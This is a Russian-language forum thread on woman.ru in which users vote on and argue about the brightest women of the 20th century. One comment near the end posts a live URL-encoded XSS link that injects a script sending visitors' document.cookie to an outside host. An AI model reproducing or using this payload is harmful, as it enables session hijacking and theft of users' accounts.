Интересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статьяИнтересная статья
Добавить тему

Выберите самых ярких женщин XX века

Капризные, властные, вздорные и гениальные – эти женщины вышли из-за спины мужчин и показали, насколько женственным и прекрасным может быть наш мир. Они не сидели, сложа руки. Они активно перекраивали все сферы жизни: политику, искусство, моду, бизнес. В преддверии 8 марта Woman.ru предлагает вам выбрать 10 женщин, которые сделали ХХ век лучше.
Вы можете выбрать сразу несколько вариантов ответа!
Голосуйте!
<p><a href="http://www.woman.ru/survey/935926/">Посмотреть!</a></p>
<style>
.public-text ul {margin-left: 5px !important;}
</style>

Ответы (40) Ответить
  • Проголосовала.

• Реклама

• Ну если так рассуждать то в их числе и Я и моя Мама.
    Мы почетные доноры Мама донор СССР Я донор РСФСР.
    Жизней не мало спасли в общем :-)

• У меня не открывается, жму "Посмотреть" , обновляется эта страница.
    Вообще, сайт какой-то идиотский стал. Сообщения постоянно не отправляются или отправляются 2-3 раза, страницы и сам форум, наверное, минимум в 50% случаев зависают или не открываются.

• А где голосовать-то?Я по ссылке пытаюсь перейти,а меня опять на форум выбрасывает

• Гость3,у меня вообще цирк.Вижу,что в теме есть хотя бы 1 голос.Открываю,а там ноль.Ответы не отображаются

• Викусик, у меня тоже такое бывает))).

• да что такое?????уже 7 ответов,а у меня только 2((((((((

• И у меня та же песня. Ни фига не открывается! Тогда я проголосую за Пинк и Гвен Стефани. Они точно ярче всех красятся.

• Да вашу пик и Гвин стеф никто через десяток лет и не вспомнит, если уж об этой сфере говорить, МЕРЛИН и МАДОННА.!!

• Ах-простите, Пик=Пинк...

• а что в этом списке делают Гурченко и Мадонна?

• 13 А Мадонна нынче везде. А уж Гурченко - это бред совсем

• N A O M I C A M P B E L L !!! шоколадно-восковая богиня 20 в.

• Самые яркие))) Я считаю что нельзя выбирать между яркой актрисой и принцессами. Слишком большая разница в них. Одну никогда не выберешь. Лучше бы сделать самая яркая актриса 20 века или самая красивая принцесса.....

• список составлен очень субъктивно, очевидно, с учётом исключительно преференций автора.

• Поставить в одном списке мать Терезу и Людмилу Гурченко - это нечто!

• тупо так... если в посте ссылка на голосование, то к чему эта подпись "Дуся"?? На совсем *** расчитано, что ли? Подписывались бы как админы. А то совсем уж народ за оовец держат

• Какая-то сборная солянка. Тут и политики, и актрисы-певицы, и "голубокровные"... Проголосовала, правда.
    Ответы не удивили: разумеется, пальму первенства держат просто самые нашумевшие дэушки. Лично я совершенно не понимаю, в каком месте они сделали 20-ый век лучше... Но то, что это самые попсовые (от слова популярность) личности - безусловно.

• Ну я за Мэрилин Монро проголосовала - про остальных я и не вспомню в обычных обстоятельствах... А где другие, яркие и красивые женщины? Я бы проголосовала, например, за Вивьен Ли, Элизабет Тейлор, Монику Витти, Сару Монтьель, Далиду, Марию Каллас... Да много еще за кого... Принцесса Диана меня совсем не вдохновляет, если честно.

• все эти дамы безусловно, оставили след в истории 20 века, но сказать, что какая-то из них реально улучшила мир...

• Одри Хэпберн - непревзойденный идеал женстенности, нежности и красоты.

• Без шиньонов, приклеенных ресниц и дизайнерских нарядов, ваша Хепберн - серая мышь.

• А чем принцесса Диана его лучше сделала, мне интересно? Благотворительностью занималась она что ли? Голосов набирает больше, чем Мать Тереза. А список и правда какой-то мягко говоря странный

• Девочки, а я вот удивляюсь, как это вумен в списки Джоли не включил, они ж помешаны на ней!!!))))

• Ага! Прислушиваются к нам!!)) Дусю всетаки сменили на админа!!))))

• Проголосовала за Шанель, она сделала революцию в моде! перевернула представления о женщине, сделала её сексуальной ,разнообразила женский гардероб, придумала духи, бижутерию и много чего. Диана...... а что она сделала? от безделья благотворительностью занималась , да они все прЫнцессы ей занимаются, попробовали бы не заниматься ...... таких как мать Тереза много, а всяких там гурчинков,мадонн, орловых,пугачёвых ......каждые 10-15лет новые кумиры,кого больше распиарят....

• Я думаю, что у каждого времени - свои символы, поэтому не надо мешать в одну кучу "всяких там гурчинков, орловых, пугачевых"... Каждая из этих женщин достойна представлять 20-й век, хотя бы потому, что они всю жизнь прожили в одной стране, нашей (какой бы она, страна, ни была - нищей, жестокой и тд.), и эти женщины были визитной карточкой страны, да и сейчас ею остаются. Назовите хоть одну леди России, которая станет олицетворением хотя бы начала 21-го века.

• 20 век выявил много очень деятельных женщин, начиная с врачей и до летчиков-космонавтов. Например, Марина Попович,Светлана Савицкая, Мария Кюри и т.д.

• Проголосовала за тех, кто добился высот своим трудом. За Мать Тэрезу, Майю Михайловну Плисецкую, за Аллу Пугачеву, Опру
    Не считаю выдающимися и значительными женщин, лишь волей чистого случая оказавшихся "на высоте" - всяческих там королев, принцесс и жен "шишек". Нет в том их заслуги.
    34 Бежевая, полностью присоединяюсь к Вашему мнению. И правда, почему-то в списке нет самых действительно ярких женщин ХХ века - Валентины Терешковой и Светланы Савицкой. Наверное потому, что "не гламурные"? Да и Голду Меир забыли туда внести, и Александру Коллонтай, и Веронику Дударову, Галину Вишневскую, и многих других, действительно выдающихся женщин.

• Из поста 35 случайно удалились другие имена, за кого я голосовала: Маргарет Тэтчер, Одри Хэпберн, других звёздных актрис.

• А еще за Коко Шанель и Эсте Лаудер.

• И еще меня поражает, как это в списке нет Наталии Бехтеревой - выдающегося ученого ХХ-ХХI веков. Тот еще списочек....

• Ахтунг ***!!! http://www.woman.ru/gsearch/?keyword=%22%3E+%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3A%2F%2Fsnu.hut1.ru%2Fs.gif%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E&cx=004494191711272596185%3Arelvi0ijwcy&control_charset=%CA%EE%ED%F2%F0%EE%EB%FC

• Я проголосовала за Маргарет Тэтчер. Ведь она вывела из кризиса целую страну-считайте миллион людей!

Оставить комментарий
Внимание, перед отправкой своего сообщения ознакомьтесь